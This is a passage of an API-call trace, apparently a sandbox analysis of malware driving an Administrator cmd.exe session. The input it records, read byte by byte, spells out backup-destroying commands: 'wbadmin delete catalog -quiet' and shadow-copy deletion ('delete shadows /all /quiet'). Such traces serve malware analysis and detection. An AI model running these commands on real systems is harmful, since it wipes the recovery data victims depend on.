lpExitCode=0x26f008 | out: lpExitCode=0x26f008*=0x0) returned 1 [0120.462] CloseHandle (hObject=0x54) returned 1 [0120.462] _vsnwprintf (in: _Buffer=0x26f278, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f018 | out: _Buffer="00000000") returned 8 [0120.463] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0120.463] GetProcessHeap () returned 0x460000 [0120.463] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47b500 | out: hHeap=0x460000) returned 1 [0120.463] GetEnvironmentStringsW () returned 0x47aa10* [0120.463] GetProcessHeap () returned 0x460000 [0120.463] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0e) returned 0x47eb10 [0120.463] FreeEnvironmentStringsW (penv=0x47aa10) returned 1 [0120.463] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0120.463] GetProcessHeap () returned 0x460000 [0120.463] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47eb10 | out: hHeap=0x460000) returned 1 [0120.463] GetEnvironmentStringsW () returned 0x47aa10* [0120.463] GetProcessHeap () returned 0x460000 [0120.463] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0e) returned 0x47eb10 [0120.463] FreeEnvironmentStringsW (penv=0x47aa10) returned 1 [0120.463] GetProcessHeap () returned 0x460000 [0120.463] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x478900 | out: hHeap=0x460000) returned 1 [0120.463] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f0d8 | out: lpAttributeList=0x26f0d8) [0120.465] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0120.466] _get_osfhandle (_FileHandle=1) returned 0x12c [0120.466] SetConsoleMode (hConsoleHandle=0x12c, dwMode=0x0) returned 0 [0120.466] _get_osfhandle (_FileHandle=1) returned 0x12c [0120.466] GetConsoleMode (in: hConsoleHandle=0x12c, lpMode=0x4a92e194 | out: lpMode=0x4a92e194) returned 0 [0120.466] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.466] GetConsoleMode (in: hConsoleHandle=0x120, lpMode=0x4a92e198 | out: lpMode=0x4a92e198) returned 0 [0120.466] GetConsoleOutputCP () returned 0x1b5 [0120.466] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a93bfe0 | out: lpCPInfo=0x4a93bfe0) returned 1 [0120.467] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0120.467] GetProcessHeap () returned 0x460000 [0120.467] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479c40 | out: hHeap=0x460000) returned 1 [0120.467] GetProcessHeap () returned 0x460000 [0120.467] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479b00 | out: hHeap=0x460000) returned 1 [0120.467] GetProcessHeap () returned 0x460000 [0120.467] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475b70 | out: hHeap=0x460000) returned 1 [0120.467] GetProcessHeap () returned 0x460000 [0120.467] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479a80 | out: hHeap=0x460000) returned 1 [0120.467] GetProcessHeap () returned 0x460000 [0120.467] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461cd0 | out: hHeap=0x460000) returned 1 [0120.467] GetProcessHeap () returned 0x460000 [0120.467] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461ab0 | out: hHeap=0x460000) returned 1 [0120.467] GetProcessHeap () returned 0x460000 [0120.467] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4798a0 | out: hHeap=0x460000) returned 1 [0120.467] GetProcessHeap () returned 0x460000 [0120.467] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474610 | out: hHeap=0x460000) returned 1 [0120.467] GetProcessHeap () returned 0x460000 [0120.467] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4797e0 | out: hHeap=0x460000) returned 1 [0120.468] _vsnwprintf (in: _Buffer=0x4a946340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f538 | out: _Buffer="\r\n") returned 2 [0120.468] _get_osfhandle (_FileHandle=1) returned 0x12c [0120.468] GetFileType (hFile=0x12c) returned 0x3 [0120.468] _get_osfhandle (_FileHandle=1) returned 0x12c [0120.468] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0120.468] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f508, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f508*=0x2, lpOverlapped=0x0) returned 1 [0120.468] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0120.468] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a93c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0120.468] _vsnwprintf (in: _Buffer=0x4a92eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f548 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0120.469] _vsnwprintf (in: _Buffer=0x4a92ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x26f548 | out: _Buffer=">") returned 1 [0120.469] _get_osfhandle (_FileHandle=1) returned 0x12c [0120.469] GetFileType (hFile=0x12c) returned 0x3 [0120.469] _get_osfhandle (_FileHandle=1) returned 0x12c [0120.469] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0120.469] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x26f538, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f538*=0x26, lpOverlapped=0x0) returned 1 [0120.469] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.469] GetFileType (hFile=0x120) returned 0x3 [0120.469] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.469] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.469] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.469] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e320, cchWideChar=1 | out: lpWideCharStr="wssadmin delete shadows /all /quiet\n") returned 1 [0120.469] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.469] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.469] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.469] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e322, cchWideChar=1 | out: lpWideCharStr="bsadmin delete shadows /all /quiet\n") returned 1 [0120.470] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.470] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.470] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.470] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e324, cchWideChar=1 | out: lpWideCharStr="aadmin delete shadows /all /quiet\n") returned 1 [0120.470] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.470] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.470] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.470] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e326, cchWideChar=1 | out: lpWideCharStr="ddmin delete shadows /all /quiet\n") returned 1 [0120.470] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.470] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.470] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.470] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e328, cchWideChar=1 | out: lpWideCharStr="mmin delete shadows /all /quiet\n") returned 1 [0120.470] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.470] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.470] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.470] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e32a, cchWideChar=1 | out: lpWideCharStr="iin delete shadows /all /quiet\n") returned 1 [0120.470] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.470] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.470] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.471] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e32c, cchWideChar=1 | out: lpWideCharStr="nn delete shadows /all /quiet\n") returned 1 [0120.471] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.471] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.471] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.471] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e32e, cchWideChar=1 | out: lpWideCharStr=" delete shadows /all /quiet\n") returned 1 [0120.471] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.471] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.471] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.471] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e330, cchWideChar=1 | out: lpWideCharStr="ddelete shadows /all /quiet\n") returned 1 [0120.471] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.471] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.471] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.471] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e332, cchWideChar=1 | out: lpWideCharStr="eelete shadows /all /quiet\n") returned 1 [0120.471] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.471] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.471] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.471] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e334, cchWideChar=1 | out: lpWideCharStr="llete shadows /all /quiet\n") returned 1 [0120.471] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.471] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.471] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e336, cchWideChar=1 | out: lpWideCharStr="eete shadows /all /quiet\n") returned 1 [0120.472] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.472] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.472] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e338, cchWideChar=1 | out: lpWideCharStr="tte shadows /all /quiet\n") returned 1 [0120.472] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.472] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.472] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e33a, cchWideChar=1 | out: lpWideCharStr="ee shadows /all /quiet\n") returned 1 [0120.472] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.472] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.472] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e33c, cchWideChar=1 | out: lpWideCharStr=" shadows /all /quiet\n") returned 1 [0120.472] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.472] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.472] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e33e, cchWideChar=1 | out: lpWideCharStr="cshadows /all /quiet\n") returned 1 [0120.472] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.472] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.472] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e340, cchWideChar=1 | out: lpWideCharStr="ahadows /all /quiet\n") returned 1 [0120.473] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.473] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.473] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e342, cchWideChar=1 | out: lpWideCharStr="tadows /all /quiet\n") returned 1 [0120.473] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.473] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.473] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e344, cchWideChar=1 | out: lpWideCharStr="adows /all /quiet\n") returned 1 [0120.473] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.473] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.473] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e346, cchWideChar=1 | out: lpWideCharStr="lows /all /quiet\n") returned 1 [0120.473] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.473] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.473] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e348, cchWideChar=1 | out: lpWideCharStr="ows /all /quiet\n") returned 1 [0120.473] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.473] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.473] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e34a, cchWideChar=1 | out: lpWideCharStr="gs /all /quiet\n") returned 1 [0120.474] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.474] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.474] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e34c, cchWideChar=1 | out: lpWideCharStr=" /all /quiet\n") returned 1 [0120.474] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.474] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.474] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e34e, cchWideChar=1 | out: lpWideCharStr="-/all /quiet\n") returned 1 [0120.474] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.474] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.474] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e350, cchWideChar=1 | out: lpWideCharStr="qall /quiet\n") returned 1 [0120.474] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.474] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.474] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e352, cchWideChar=1 | out: lpWideCharStr="ull /quiet\n") returned 1 [0120.474] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.474] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.474] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e354, cchWideChar=1 | out: lpWideCharStr="il /quiet\n") returned 1 [0120.475] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.475] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e356, cchWideChar=1 | out: lpWideCharStr="e /quiet\n") returned 1 [0120.475] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.475] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e358, cchWideChar=1 | out: lpWideCharStr="t/quiet\n") returned 1 [0120.475] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) 